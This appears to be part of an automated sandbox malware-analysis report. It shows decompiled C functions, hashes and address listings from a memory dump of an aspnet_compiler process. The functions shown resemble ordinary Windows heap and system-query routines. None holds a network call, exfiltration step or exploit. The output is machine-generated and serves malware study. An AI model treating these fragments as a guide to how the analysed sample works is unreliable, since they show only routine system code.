                                                  0x018b29b8
                                                  0x018b29b8
                                                  0x018b29bb
                                                  0x018b29c0
                                                  0x018b29c5
                                                  0x018b29c6
                                                  0x018b29c6
                                                  0x018b29cb
                                                  0x00000000
                                                  0x00000000
                                                  0x018b29cd
                                                  0x018b29d0
                                                  0x018b29d9
                                                  0x018b29db
                                                  0x018b29dd
                                                  0x018b2a7f
                                                  0x018b2a84
                                                  0x018b2a87
                                                  0x018b2a89
                                                  0x018f5ca1
                                                  0x018f5ca3
                                                  0x00000000
                                                  0x018b2a8f
                                                  0x018b2a8f
                                                  0x00000000
                                                  0x018b2a8f
                                                  0x00000000
                                                  0x018b29e3
                                                  0x018b29e3
                                                  0x018b29e3
                                                  0x00000000
                                                  0x018b29e3
                                                  0x018b29dd
                                                  0x00000000
                                                  0x018b29db
                                                  0x018b29e6
                                                  0x018b29e9
                                                  0x018b29eb
                                                  0x018b29ed
                                                  0x018b29f3
                                                  0x018b29f5
                                                  0x018b29f8
                                                  0x018b29fa
                                                  0x018b2a97
                                                  0x018b2a9a
                                                  0x018b2a9d
                                                  0x018b2add
                                                  0x00000000
                                                  0x018b2a9f
                                                  0x018b2aa2
                                                  0x018b2aa5
                                                  0x018b2aa8
                                                  0x018b2aab
                                                  0x018f5cab
                                                  0x018f5caf
                                                  0x018f5cc5
                                                  0x018f5cda
                                                  0x018f5cdc
                                                  0x018f5cdf
                                                  0x018f5ce5
                                                  0x00000000
                                                  0x018f5ceb
                                                  0x018f5ced
                                                  0x018f5cee
                                                  0x00000000
                                                  0x018f5cee
                                                  0x018f5cb1
                                                  0x018f5cb4
                                                  0x018f5cb9
                                                  0x018f5cbb
                                                  0x00000000
                                                  0x018f5cbd
                                                  0x018f5cbd
                                                  0x00000000
                                                  0x018f5cbd
                                                  0x018f5cbb
                                                  0x018b2ab1
                                                  0x018b2ab1
                                                  0x018b2ac4
                                                  0x018b2ac6
                                                  0x018b2ac6
                                                  0x00000000
                                                  0x018b2ac6
                                                  0x018b2aab
                                                  0x00000000
                                                  0x018b2a00
                                                  0x018b2a09
                                                  0x018b2a0e
                                                  0x018b2a21
                                                  0x018b2a24
                                                  0x018b2a35
                                                  0x018b2a3a
                                                  0x018b2a3d
                                                  0x018b2a42
                                                  0x018b2a59
                                                  0x018b2a59
                                                  0x018b2a5c
                                                  0x018b2a5f
                                                  0x018b2a5f
                                                  0x018b29fa
                                                  0x018b29f3
                                                  0x018b2a64
                                                  0x018b2a64
                                                  0x018b2a6b
                                                  0x018b2a6b
                                                  0x018b2a6d
                                                  0x018b2a72
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94ae6cc146336232a11dd1c4eadad3afab211701a09d4a51e7a8614f975cdd88
                                                  • Instruction ID: f60eb1cd2154d13b6952ed37bea14540c384278bb2e50792069d5e9d64ab5f8f
                                                  • Opcode Fuzzy Hash: 94ae6cc146336232a11dd1c4eadad3afab211701a09d4a51e7a8614f975cdd88
                                                  • Instruction Fuzzy Hash: F7516871A0020ADFDF26DF59C880ADEBBB6BF48354F148119E915AB360C335AE52CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B4D3B Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E018B4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x197d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E018CFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1977bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E018CB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L018A4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = L0188CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return L018CB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E018CF380(_t67 + 0xc, 0x1865138, 0x10) == 0) {
								 *0x19760d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						L018B4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(L018B4E70(0x19786b0, 0x18b5690, 0, 0) != 0) {
					_t46 = L0188CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                  0x018b4d3b
                                                  0x018b4d4d
                                                  0x018b4d53
                                                  0x018b4d58
                                                  0x018b4d65
                                                  0x018b4d6c
                                                  0x018b4d71
                                                  0x018b4d77
                                                  0x018b4d7f
                                                  0x018b4d8c
                                                  0x018b4d8e
                                                  0x018b4dad
                                                  0x018b4db0
                                                  0x018b4db7
                                                  0x018b4db8
                                                  0x018b4db9
                                                  0x018b4dba
                                                  0x018b4dbb
                                                  0x018b4dc1
                                                  0x018b4dc8
                                                  0x018b4dcc
                                                  0x018b4dd5
                                                  0x018b4dde
                                                  0x018b4ddf
                                                  0x018b4de0
                                                  0x018b4de1
                                                  0x018b4de6
                                                  0x018b4de7
                                                  0x018b4de9
                                                  0x018b4df3
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6c7c
                                                  0x018f6c8a
                                                  0x018f6c8a
                                                  0x018f6c9d
                                                  0x018f6ca7
                                                  0x018f6cac
                                                  0x018f6cb2
                                                  0x018f6cb9
                                                  0x00000000
                                                  0x018f6cbf
                                                  0x018f6cbf
                                                  0x00000000
                                                  0x018f6cbf
                                                  0x018f6cb9
                                                  0x018b4dfb
                                                  0x018f6ccf
                                                  0x018f6cd3
                                                  0x018b4e32
                                                  0x018b4e39
                                                  0x018f6ce0
                                                  0x018f6cf2
                                                  0x018f6cf2
                                                  0x018f6ce0
                                                  0x018b4e3f
                                                  0x018b4e41
                                                  0x018b4e51
                                                  0x018b4e51
                                                  0x018b4e03
                                                  0x018b4e03
                                                  0x018b4e09
                                                  0x018b4e0f
                                                  0x018b4e57
                                                  0x00000000
                                                  0x00000000
                                                  0x018b4e1b
                                                  0x018b4e30
                                                  0x018b4e5b
                                                  0x018b4e5b
                                                  0x00000000
                                                  0x018b4e30
                                                  0x018b4e11
                                                  0x018b4e11
                                                  0x018b4e16
                                                  0x00000000
                                                  0x018b4e16
                                                  0x018b4e01
                                                  0x00000000
                                                  0x018b4e01
                                                  0x018b4da5
                                                  0x018f6c6b
                                                  0x00000000
                                                  0x018b4dab
                                                  0x018b4dab
                                                  0x00000000
                                                  0x018b4dab

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e644b3f9f7033472d26412efbc5cba9f4704e47bec6f8d1c39dfac742b35150e
                                                  • Instruction ID: 1850cbe3be45b4e9f2abe0e9ae243e2fec840b9978262c8fb87faee67d767e18
                                                  • Opcode Fuzzy Hash: e644b3f9f7033472d26412efbc5cba9f4704e47bec6f8d1c39dfac742b35150e
                                                  • Instruction Fuzzy Hash: 01419071A443189FEB229F18C882BAAB7A9EB54714F140099E946DB382D774DF44CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B4BAD Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E018B4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				short _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x197d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					L0188CC50(_t86);
					L11:
					return L018CB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1978504
				E018A2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E018CFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E018CB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L018A4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = L0188CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1978504
								L0189FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								L018B4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                  0x018b4bad
                                                  0x018b4bbf
                                                  0x018b4bc2
                                                  0x018b4bc6
                                                  0x018b4bcd
                                                  0x018b4bd9
                                                  0x018f67fe
                                                  0x018f6800
                                                  0x018b4ccc
                                                  0x018b4ccd
                                                  0x018b4cb7
                                                  0x018b4cc9
                                                  0x018b4cc9
                                                  0x018b4bdf
                                                  0x018b4be5
                                                  0x00000000
                                                  0x00000000
                                                  0x018b4beb
                                                  0x018b4bef
                                                  0x00000000
                                                  0x00000000
                                                  0x018b4bf5
                                                  0x018b4bf9
                                                  0x018b4c06
                                                  0x018b4c0b
                                                  0x018b4c17
                                                  0x018b4c1c
                                                  0x018b4c1f
                                                  0x018b4c25
                                                  0x018b4c33
                                                  0x018b4c3d
                                                  0x018b4c40
                                                  0x018b4c43
                                                  0x018b4c47
                                                  0x018b4c4d
                                                  0x018b4c53
                                                  0x018b4c54
                                                  0x018b4c55
                                                  0x018b4c56
                                                  0x018b4c5b
                                                  0x018b4c5c
                                                  0x018b4c63
                                                  0x018b4c6b
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6776
                                                  0x018f6784
                                                  0x018f6784
                                                  0x018f679f
                                                  0x018f67a7
                                                  0x018f67af
                                                  0x018f67ce
                                                  0x00000000
                                                  0x018f67b1
                                                  0x018f67b7
                                                  0x018f67b8
                                                  0x018f67c1
                                                  0x018f67d3
                                                  0x018f67d9
                                                  0x018f67dd
                                                  0x018b4c94
                                                  0x018b4c94
                                                  0x018b4c98
                                                  0x018b4c9c
                                                  0x018b4ca3
                                                  0x018f67f4
                                                  0x018f67f4
                                                  0x018b4cb5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018b4cb5
                                                  0x018b4c79
                                                  0x018b4c7e
                                                  0x018b4c89
                                                  0x018b4c8b
                                                  0x018b4c8f
                                                  0x018b4c8f
                                                  0x00000000
                                                  0x018b4c89
                                                  0x018f67c3
                                                  0x00000000
                                                  0x018f67c3
                                                  0x018f67af
                                                  0x018b4c73
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f6150aaa4f90129d3d79dbfeb10ac1b0f647d6b574271b7da4bc54af0dc5b9c
                                                  • Instruction ID: bac51417d20517f4ad35e03a0a8a8723ee9103dfb293f76709e54d56aa381c8a
                                                  • Opcode Fuzzy Hash: 5f6150aaa4f90129d3d79dbfeb10ac1b0f647d6b574271b7da4bc54af0dc5b9c
                                                  • Instruction Fuzzy Hash: 1241A835A0062D9BDB21DF68C981BEA77B4EF45B10F1101A9E909EB341EB74DF44CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01952B28 Relevance: .1, Instructions: 129COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E01952B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x1976110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E018A2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x1976110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = L0195241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								L0189FFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E01953209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E0194A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								L0189FFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E0194A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x1976110; // 0x6860035f
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                                  0x01952b28
                                                  0x01952b30
                                                  0x01952b35
                                                  0x01952b37
                                                  0x01952b3a
                                                  0x01952b3d
                                                  0x01952b44
                                                  0x01952b4d
                                                  0x01952b4d
                                                  0x01952b50
                                                  0x01952b54
                                                  0x01952bb0
                                                  0x01952bbd
                                                  0x01952be8
                                                  0x01952bef
                                                  0x01952bf4
                                                  0x01952bf7
                                                  0x01952bfa
                                                  0x01952bfd
                                                  0x01952c02
                                                  0x01952c02
                                                  0x01952c0f
                                                  0x01952c13
                                                  0x01952c3b
                                                  0x01952c4a
                                                  0x01952c4f
                                                  0x01952c52
                                                  0x01952c52
                                                  0x01952c59
                                                  0x01952c62
                                                  0x01952c62
                                                  0x01952c69
                                                  0x01952c15
                                                  0x01952c18
                                                  0x01952c19
                                                  0x01952c21
                                                  0x01952c29
                                                  0x01952c2f
                                                  0x01952c2f
                                                  0x01952c29
                                                  0x01952bbf
                                                  0x01952bc2
                                                  0x01952bc3
                                                  0x01952bc9
                                                  0x01952bc9
                                                  0x01952c72
                                                  0x01952c72
                                                  0x01952b56
                                                  0x01952b5c
                                                  0x01952b62
                                                  0x01952b64
                                                  0x01952b72
                                                  0x01952b77
                                                  0x01952ba3
                                                  0x01952ba3
                                                  0x01952ba5
                                                  0x01952baa
                                                  0x00000000
                                                  0x01952baa
                                                  0x01952b7e
                                                  0x01952b84
                                                  0x01952b86
                                                  0x01952b97
                                                  0x01952b9c
                                                  0x01952b9e
                                                  0x01952b9e
                                                  0x00000000
                                                  0x01952b9e
                                                  0x01952b8b
                                                  0x01952b90
                                                  0x00000000
                                                  0x00000000
                                                  0x01952b95
                                                  0x00000000
                                                  0x01952b95
                                                  0x01952b6b
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0ff88d71848e2bda0b6789833a274e47201e10cb027de500f22b959c705fc32
                                                  • Instruction ID: 4292f75c5f6f73da14de8646664b8a6d1e56d22022fa21e407253fcab4ca3b9e
                                                  • Opcode Fuzzy Hash: f0ff88d71848e2bda0b6789833a274e47201e10cb027de500f22b959c705fc32
                                                  • Instruction Fuzzy Hash: 62412973B14505EBD764CF6CC88497AB7A9EF88320B158669ED19E7381D734ED02C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0194AA16 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0194AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0194ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0194AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = L0194AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0192CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L018A77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(L018A7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0194131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0192CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                  0x0194aa1f
                                                  0x0194aa21
                                                  0x0194aa23
                                                  0x0194aa2b
                                                  0x0194aa30
                                                  0x0194aa36
                                                  0x0194aa39
                                                  0x0194aa42
                                                  0x0194aa75
                                                  0x0194aa7a
                                                  0x0194aa7c
                                                  0x0194aa7c
                                                  0x0194aa88
                                                  0x0194aa8a
                                                  0x0194aa8f
                                                  0x0194ab02
                                                  0x0194ab04
                                                  0x0194aa99
                                                  0x0194aaa8
                                                  0x0194aaaf
                                                  0x0194aab3
                                                  0x0194aacc
                                                  0x0194aad1
                                                  0x0194aad6
                                                  0x0194aae0
                                                  0x0194aaf3
                                                  0x0194aaf9
                                                  0x0194aafe
                                                  0x0194aafe
                                                  0x0194aaf3
                                                  0x0194aad6
                                                  0x0194aab3
                                                  0x0194ab07
                                                  0x0194ab0a
                                                  0x0194ab11
                                                  0x0194ab23
                                                  0x0194ab13
                                                  0x0194ab1c
                                                  0x0194ab1c
                                                  0x0194ab2b
                                                  0x0194ab44
                                                  0x0194ab44
                                                  0x0194ab51
                                                  0x0194ab51
                                                  0x0194aa44
                                                  0x0194aa47
                                                  0x0194aa4c
                                                  0x00000000
                                                  0x00000000
                                                  0x0194aa5a
                                                  0x0194aa64
                                                  0x0194aa72
                                                  0x00000000
                                                  0x0194aa66
                                                  0x0194aa66
                                                  0x0194aa68
                                                  0x0194aa6a
                                                  0x00000000
                                                  0x0194aa6a

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction ID: 532a3faf4a295f094032d826c07a49f52ff994e9f0df748fba65eb194b7ecfc7
                                                  • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction Fuzzy Hash: 1D31F332F402456BEB15CB6AC845FAFFBABEF84211F054469E90AA7291DA74DD00C650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01898A0A Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E01898A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x197d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L018CB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0189E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1861180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E018B1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							L018C3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01898999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                  0x01898a0a
                                                  0x01898a1c
                                                  0x01898a23
                                                  0x01898a2e
                                                  0x01898a30
                                                  0x01898a36
                                                  0x01898a3c
                                                  0x01898a3e
                                                  0x01898a4a
                                                  0x01898a52
                                                  0x01898a9c
                                                  0x01898aae
                                                  0x01898a58
                                                  0x01898a5e
                                                  0x01898a6a
                                                  0x01898a6f
                                                  0x01898a75
                                                  0x01898a7d
                                                  0x01898a85
                                                  0x01898a86
                                                  0x01898a89
                                                  0x01898a93
                                                  0x01898a99
                                                  0x01898a9b
                                                  0x00000000
                                                  0x01898aaf
                                                  0x01898abe
                                                  0x01898ac3
                                                  0x01898acb
                                                  0x01898ad7
                                                  0x01898ae0
                                                  0x01898af1
                                                  0x00000000
                                                  0x01898af1
                                                  0x01898acd
                                                  0x01898ad5
                                                  0x01898afb
                                                  0x01898afd
                                                  0x01898aff
                                                  0x01898b07
                                                  0x01898b22
                                                  0x01898b24
                                                  0x01898b2a
                                                  0x01898b2e
                                                  0x01898b3f
                                                  0x01898b78
                                                  0x01898b41
                                                  0x01898b52
                                                  0x01898b54
                                                  0x01898b5c
                                                  0x01898b74
                                                  0x01898b74
                                                  0x01898b5c
                                                  0x01898b3f
                                                  0x01898b5e
                                                  0x01898b61
                                                  0x01898b64
                                                  0x01898b64
                                                  0x01898b6c
                                                  0x01898b6c
                                                  0x01898b11
                                                  0x018e9cd5
                                                  0x018e9cd5
                                                  0x01898b17
                                                  0x01898b1a
                                                  0x01898b1a
                                                  0x00000000
                                                  0x01898ad5
                                                  0x01898a89

                                                  Memory Dump Source
